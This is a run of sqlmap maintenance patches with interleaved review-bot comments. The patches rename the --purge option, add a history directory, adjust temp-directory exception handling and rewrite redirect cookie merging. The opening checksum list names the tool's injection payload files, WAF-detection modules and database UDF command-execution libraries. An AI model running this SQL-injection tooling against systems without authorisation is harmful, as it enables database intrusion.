+0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ +c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ +ec41a080f4570c3866b9a7219f7623c4 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ +337e2b84dfb089d1ba78323ab2fd21bd udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ +e3234ad91b65c476e69743b196ea8394 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ +2e39682ab7f7f9d6bcce6a3f9dac576b udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ +b17ade3fe472b00f6d4d655f0d1036b2 
udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ +3dfc42ea62f5db4196a1b736c603ef0f udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ +fe297bfe5e27e7f99d64b2d6baa766fe udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ +d7ce763983f5ef4cdae07480c7e16c36 udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ +f9e5d7a8f1fbd8df80d07f72ada0251b udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ +10a20abaf98ff25527702c7e37187427 udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ +0b5158292758f4a67cb1bdfcefcd4ef3 udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ +1d8eb0e3d38f1265ea1bef7f9ec60230 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ +1222dac08cf53e31e74e350a2c17452f udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ +27761c5e046da59f1f1e11f6d194e38a udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ +a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ +d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ +ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ +0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ +336d0b0d2be333f5a6184042c85464fd waf/360.py +667cacdcd4ba650c9a436f081a79cd64 waf/airlock.py +7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py +b61329e8f8bdbf5625f9520ec010af1f waf/armor.py +dec64f18c23962d279cc1cde6469afed waf/asm.py +6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py +ef722d062564def381b1f96f5faadee3 waf/baidu.py +07bc4b531d2353c9acfbfcada94ff12b waf/barracuda.py +82efee4639f7be75041c0145a6bc8578 waf/bigip.py +6a2834daf767491d3331bd31e946d540 waf/binarysec.py +41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py +2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py +ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py +21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py +b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py +ac96f34c254951d301973617064eb1b5 waf/comodo.py 
+56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py +1538b661e35843074f4599be93b3fae9 waf/denyall.py +aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py +357cbc0a17a44e4f64062b799c718e0b waf/dotdefender.py +7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py +954bebd4a246d8b88794de00ccaecd3b waf/expressionengine.py +a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py +eb56ac34775cc3c5f721ec967d04b283 waf/generic.py +1c70655551b8296ceeb19292a342e620 waf/hyperguard.py +525483047474e6f15d9898b525bdafd3 waf/incapsula.py +1e5532ede194ac9c083891c2f02bca93 waf/__init__.py +30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py +5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py +898f53c12133da3e946301f4aa97d538 waf/knownsec.py +81e6bf619c7bb73c4b62e2439e60e95a waf/kona.py +b17a154fe7959619eaafffa60e14199f waf/modsecurity.py +d09a50713daf3c0a2594ed4f50c57adb waf/naxsi.py +bf573d01d56e585f4ad57132bc594934 waf/netcontinuum.py +cb2f1516867684042f580e02138463de waf/netscaler.py +63b3cc819f432a32a403e24a00ab4d23 waf/newdefend.py +a925b2979c8e8aafb9e9a338ba4da6cf waf/nsfocus.py +ad7fe23004f8e0d02534c7baa877add3 waf/paloalto.py +856e34d47fedfe96039a6a7807f9605a waf/profense.py +166eb53544536e3e86223d513b8b688d waf/proventia.py +78a40eca7ddd14c4eaf911de7748b487 waf/radware.py +f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py +acb82b21f4032ceb510a58142add02ab waf/safe3.py +67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py +d1b67820442199181815ec3fce27e582 waf/secureiis.py +34f0ec775835744bed601ef7c7a21c9d waf/senginx.py +1508a5200534b5273b66cecfd299e53e waf/sitelock.py +b088cf83c1a681d143e7eaea43f52b80 waf/sonicwall.py +4c412bc70007e6108d109e2911f2cefe waf/sophos.py +0e244e097a648158948dc8bb2351c781 waf/stingray.py +d5a5cef222f0e27f47bec3c4228e255e waf/sucuri.py +46224e3fa4b819da227c50fd45155823 waf/tencent.py +dffa9cebad777308714aaf83b71635b4 waf/teros.py +b37210459a13de40bf07722c4d032c33 waf/trafficshield.py +fe01932df9acea7f6d23f03c6b698646 waf/urlscan.py 
+a687449cd4e45f69e33b13d41e021480 waf/uspses.py +f3a81da13ee098e94edd965ea4b37b04 waf/varnish.py +20840afc269920826deac2b6c00d6b9c waf/wallarm.py +11205abf397ae9072adc3234b656ade9 waf/watchguard.py +9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py +5b1eefdc39d449a74fce0564364b0e09 waf/webknight.py +11a5c6b10ced11e505a74e36ee2503b3 waf/wordfence.py +68e332530fab216d017ede506c3fec2f waf/yundun.py +bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py +705ac8663513c12150cb5623ef4a04fb waf/zenedge.py +dc394c5b90ada0a5d5853b5ad1f7d56d xml/banner/generic.xml +d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml +7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml +9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml +c26cd4fa986ddc9f6d92dd87c8fc61cb xml/banner/postgresql.xml +4970709ca31bcaea5eb79547a132606a xml/banner/server.xml +d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml +58be20a3b29a9108d043786907700469 xml/banner/set-cookie.xml +d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml +350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml +817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml +fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml +0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml +a279656ea3fcb85c727249b02f828383 xml/livetests.xml +3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml +b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml +06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml +3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml +c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml +ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml +a5eecbca03800851635817e0ca832a92 xml/queries.xml From 5e2d0bd320d48c39b76354b2873fe178135e1187 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar
Date: Wed, 20 Jun 2018 23:52:08 +0200
Subject: [PATCH 185/428] Minor patches (--purge instead of --purge-output)

---
 lib/core/common.py | 13 +++++++-----
 lib/core/dicts.py | 1 +
 lib/core/option.py | 10 ++++-----
 lib/core/optiondict.py | 2 +-
 lib/core/settings.py | 2 +-
 lib/core/target.py | 48 ++++++++++++++++++++++--------------------
 lib/parse/cmdline.py | 6 +++---
 txt/checksum.md5 | 14 ++++++------
 8 files changed, 51 insertions(+), 45 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index ac6bc7b7a26..aef46a15498 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1273,12 +1273,15 @@ def setPaths(rootPath):
     paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
     paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
 
+    # history files
+    paths.SQLMAP_HISTORY_PATH = getUnicode(os.path.join(_, "history"), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
+    paths.API_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, "api.hst")
+    paths.OS_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, "os.hst")
+    paths.SQL_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, "sql.hst")
+    paths.SQLMAP_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, "sqlmap.hst")
+    paths.GITHUB_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, "github.hst")
+
     # sqlmap files
-    paths.API_SHELL_HISTORY = os.path.join(_, "api.hst")
-    paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
-    paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
-    paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
-    paths.GITHUB_HISTORY = os.path.join(_, "github.hst")
     paths.CHECKSUM_MD5 = os.path.join(paths.SQLMAP_TXT_PATH, "checksum.md5")
     paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
     paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
diff --git a/lib/core/dicts.py b/lib/core/dicts.py
index de05a87bd6a..4ea69a8a53c 100644
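Review bot: `paths.SQLMAP_HISTORY_PATH` is only computed in `setPaths`; nothing in this hunk creates the `history` directory, so the first write of `api.hst`, `os.hst`, `sql.hst`, `sqlmap.hst` or `github.hst` fails with a missing-directory error unless something else creates it (the rest of `setPaths`, its callers and the `lib/core/target.py` changes in this commit are outside the hunk — please confirm one of them does). Creating the directory alongside the other per-run output directories, or lazily in the history load/save helpers, would close that gap. Separately, only `SQLMAP_HISTORY_PATH` goes through `getUnicode(...)` with the filesystem encoding; a short comment that the five `.hst` paths inherit that from the join, e.g. `# history files (the .hst paths below inherit the unicode base path)`, would explain why they are not wrapped too.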
--- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -281,6 +281,7 @@ "--auth-private": "use '--auth-file' instead", "--ignore-401": "use '--ignore-code' instead", "--second-order": "use '--second-url' instead", + "--purge-output": "use '--purge' instead", "--check-payload": None, "--check-waf": None, "--pickled-options": "use '--api -c ...' instead", diff --git a/lib/core/option.py b/lib/core/option.py index f0d0ed868f0..4d30bc0ce17 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1638,13 +1638,13 @@ def _cleanupEnvironment(): if hasattr(socket, "_ready"): socket._ready.clear() -def _purgeOutput(): +def _purge(): """ - Safely removes (purges) output directory. + Safely removes (purges) sqlmap data directory. """ - if conf.purgeOutput: - purge(paths.SQLMAP_OUTPUT_PATH) + if conf.purge: + purge(paths.SQLMAP_HOME_PATH) def _setConfAttributes(): """ @@ -2450,7 +2450,7 @@ def init(): _setRequestFromFile() _cleanupOptions() _cleanupEnvironment() - _purgeOutput() + _purge() _checkDependencies() _createTemporaryDirectory() _basicOptionValidation() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 54d781c4dea..e8c25ac627e 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -229,7 +229,7 @@ "identifyWaf": "boolean", "mobile": "boolean", "offline": "boolean", - "purgeOutput": "boolean", + "purge": "boolean", "skipWaf": "boolean", "smart": "boolean", "tmpDir": "string", diff --git a/lib/core/settings.py b/lib/core/settings.py index 92f318a2391..1a2581c74cd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.35" +VERSION = "1.2.6.36" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
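Review bot: `_purge()` now wipes `paths.SQLMAP_HOME_PATH` instead of only the output directory, which per the `setPaths` hunk in this same commit also hosts the api/os/sql shell history files and presumably session data, yet the deprecation text added in dicts.py (`"--purge-output": "use '--purge' instead"`) presents the two options as interchangeable. A user who scripted `--purge-output` to clear dumped data will now also lose everything else under the home path. I would state the wider scope in the deprecation string, e.g. `"--purge-output": "use '--purge' instead (removes the whole sqlmap data directory, not only 'output')"`, and have `_purge()` refuse to run when `paths.SQLMAP_HOME_PATH` is empty or is a symlink, since `purge()` is not visible here and I cannot tell whether it guards against that itself.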
diff --git a/lib/core/target.py b/lib/core/target.py index 4ab2e2cca55..c20adfb8faa 100644 --- a/lib/core/target.py +++ b/lib/core/target.py 
@@ -619,33 +619,35 @@ def _createTargetDirs(): Create the output directory. """ - try: - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - os.makedirs(paths.SQLMAP_OUTPUT_PATH) + for context in "output", "history": + directory = paths["SQLMAP_%s_PATH" % context.upper()] + try: + if not os.path.isdir(directory): + os.makedirs(directory) - _ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr()) - open(_, "w+b").close() - os.remove(_) + _ = os.path.join(directory, randomStr()) + open(_, "w+b").close() + os.remove(_) - if conf.outputDir: - warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH - logger.warn(warnMsg) - except (OSError, IOError), ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") - except Exception, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) + if conf.outputDir and context == "output": + warnMsg = "using '%s' as the %s directory" % (directory, context) + logger.warn(warnMsg) + except (OSError, IOError), ex: + try: + tempDir = tempfile.mkdtemp(prefix="sqlmap%s" % context) + except Exception, _: + errMsg = "unable to write to the temporary directory ('%s'). " % _ + errMsg += "Please make sure that your disk is not full and " + errMsg += "that you have sufficient write permissions to " + errMsg += "create temporary files and/or directories" + raise SqlmapSystemException(errMsg) - warnMsg = "unable to %s output directory " % ("create" if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH) else "write to the") - warnMsg += "'%s' (%s). 
" % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) - logger.warn(warnMsg) + warnMsg = "unable to %s %s directory " % ("create" if not os.path.isdir(directory) else "write to the", context) + warnMsg += "'%s' (%s). " % (directory, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warn(warnMsg) - paths.SQLMAP_OUTPUT_PATH = tempDir + paths["SQLMAP_%s_PATH" % context.upper()] = tempDir conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname))) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index dcbf3d876a5..062f52c6f3a 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -643,8 +643,8 @@ def cmdLineParser(argv=None): miscellaneous.add_option("--offline", dest="offline", action="store_true", help="Work in offline mode (only use session data)") - miscellaneous.add_option("--purge-output", dest="purgeOutput", action="store_true", - help="Safely remove all content from output directory") + miscellaneous.add_option("--purge", dest="purge", action="store_true", + help="Safely remove all content from sqlmap data directory") miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true", help="Skip heuristic detection of WAF/IPS/IDS protection") 
@@ -874,7 +874,7 @@ def _(self, *args): if args.dummy: args.url = args.url or DUMMY_URL - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purgeOutput, args.sitemapUrl)): + if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl)): errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " errMsg += "use -h for basic or -hh for advanced help\n" parser.error(errMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5ddc8ad89b0..5a53224d667 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
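Review bot: The mandatory-option error message on the new line still lists `--purge-output`, although this same commit renames the option to `--purge` (cmdline.py hunk above and the dicts.py deprecation entry), so the help text points users to an option that now only prints a deprecation notice. Change it to `errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge or --dependencies), "`. Given that `--purge` now removes the whole sqlmap data directory, it is also worth confirming that a bare `sqlmap --purge` being accepted as a complete invocation via the `any(...)` list is intended.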
@@ -28,30 +28,30 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -6165b8a826803b29c479d47a60e8dbf6 lib/core/common.py +acec51826b280ad96dedbb56515e3988 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -98b730cef6a59ab044a108276aef6f42 lib/core/dicts.py +db165596ef0a3e19ec59c24192bb318d lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py -5d25911fbd379c32d5bf918c79febc0b lib/core/option.py +13c0a490b5a928b64236b4a15e578267 lib/core/optiondict.py +4ef6c718b5069f7468c647b5e29fd3db lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4742105fe7dd3964e11961c44cf9e851 lib/core/settings.py +770a509eb586d686c1ca318171d17a33 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py +95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f 
lib/core/unescaper.py @@ -59,7 +59,7 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -2b3b021a8e7e119d0553c02b110d07d9 lib/parse/cmdline.py +3dd11b8be62e15a9d54cf5f08c603ffc lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From c0947846f4bc60c92f15f3270bc9a0088f57b322 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 29 Jun 2018 16:33:17 +0200 Subject: [PATCH 186/428] Patch for #3164 --- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 4d30bc0ce17..29cb4acf09c 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1409,7 +1409,7 @@ def _createTemporaryDirectory(): try: if not os.path.isdir(tempfile.gettempdir()): os.makedirs(tempfile.gettempdir()) - except (OSError, IOError, WindowsError), ex: + except Exception, ex: warnMsg = "there has been a problem while accessing " warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) warnMsg += "make sure that there is enough disk space left. If problem persists, " diff --git a/lib/core/settings.py b/lib/core/settings.py index 1a2581c74cd..e87ff8f6214 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.36" +VERSION = "1.2.6.37" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
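Review bot: Widening the handler to `except Exception, ex:` fixes the likely trigger (a `NameError` on `WindowsError` outside Windows — inferred from the issue reference, not visible here) but now reports any programming error in the two guarded lines, e.g. a `TypeError` from a bad `tempfile.tempdir` value, as a disk-space warning. `WindowsError` is a subclass of `OSError` on the platforms where it exists, so `except (OSError, IOError), ex:` covers it without the widening. The body of `_createTemporaryDirectory` continues past the hunk.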
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5a53224d667..68ec5339fb5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -41,14 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 13c0a490b5a928b64236b4a15e578267 lib/core/optiondict.py -4ef6c718b5069f7468c647b5e29fd3db lib/core/option.py +ddb06c1293bede33d9f062b64a67f953 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -770a509eb586d686c1ca318171d17a33 lib/core/settings.py +56bf00aeba166450dff4161d11755e8b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py From fae97b393731bf156303497604105ec1c1709f6b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 29 Jun 2018 16:34:16 +0200 Subject: [PATCH 187/428] Another patch for #3164 --- lib/core/option.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 29cb4acf09c..ee2d64112f7 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1420,7 +1420,7 @@ def _createTemporaryDirectory(): if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir: try: tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) - except (OSError, IOError, WindowsError): + except: tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid())) kb.tempDir = tempfile.tempdir 
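Review bot: The bare `except:` around `tempfile.mkdtemp` also catches `KeyboardInterrupt` and `SystemExit`, so a Ctrl-C during startup becomes a silent fallback to `<home>/tmp/sqlmap...` instead of stopping the run. The narrowing used elsewhere in this file is enough: `except (OSError, IOError):` (or at minimum `except Exception:`). `_createTemporaryDirectory` continues past the hunk.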
@@ -1428,7 +1428,7 @@ def _createTemporaryDirectory(): if not os.path.isdir(tempfile.tempdir): try: os.makedirs(tempfile.tempdir) - except (OSError, IOError, WindowsError), ex: + except Exception, ex: errMsg = "there has been a problem while setting " errMsg += "temporary directory location ('%s')" % getSafeExString(ex) raise SqlmapSystemException(errMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index e87ff8f6214..78437654188 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.37" +VERSION = "1.2.6.38" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 68ec5339fb5..f81308677a8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -41,14 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 13c0a490b5a928b64236b4a15e578267 lib/core/optiondict.py -ddb06c1293bede33d9f062b64a67f953 lib/core/option.py +c82dee0f62e729213b92f5ec85f74b70 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -56bf00aeba166450dff4161d11755e8b lib/core/settings.py +cf3cd30872fdf466ebad56e425c72376 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 
From 73b0de67b561f156c31c549586e06e48cdbe1cda Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 29 Jun 2018 22:37:57 +0200 Subject: [PATCH 188/428] Fixes #3149 --- lib/core/settings.py | 2 +- lib/request/redirecthandler.py | 20 ++++++++++++++------ txt/checksum.md5 | 4 ++-- 3 files changed, 17 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 78437654188..8096eb6f602 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.38" +VERSION = "1.2.6.39" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index 1642991f3ed..6d87937f288 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ -import re import time import types import urllib2 
@@ -124,12 +123,21 @@ def http_error_302(self, req, fp, code, msg, headers): req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) if headers and HTTP_HEADER.SET_COOKIE in headers: + cookies = dict() delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER - _ = headers[HTTP_HEADER.SET_COOKIE].split(delimiter)[0] - if HTTP_HEADER.COOKIE not in req.headers: - req.headers[HTTP_HEADER.COOKIE] = _ - else: - req.headers[HTTP_HEADER.COOKIE] = re.sub(r"%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" % (re.escape(_.split('=')[0]), delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter)) + last = None + + for part in req.headers.get(HTTP_HEADER.COOKIE, "").split(delimiter) + headers.getheaders(HTTP_HEADER.SET_COOKIE): + if '=' in part: + part = part.strip() + key, value = part.split('=', 1) + cookies[key] = value + last = key + elif last: + cookies[key] += "%s%s" % (delimiter, part) + + req.headers[HTTP_HEADER.COOKIE] = delimiter.join("%s=%s" % (key, cookies[key]) for key in cookies) + try: result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) except urllib2.HTTPError, e: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f81308677a8..19a6f867d6c 100644 --- 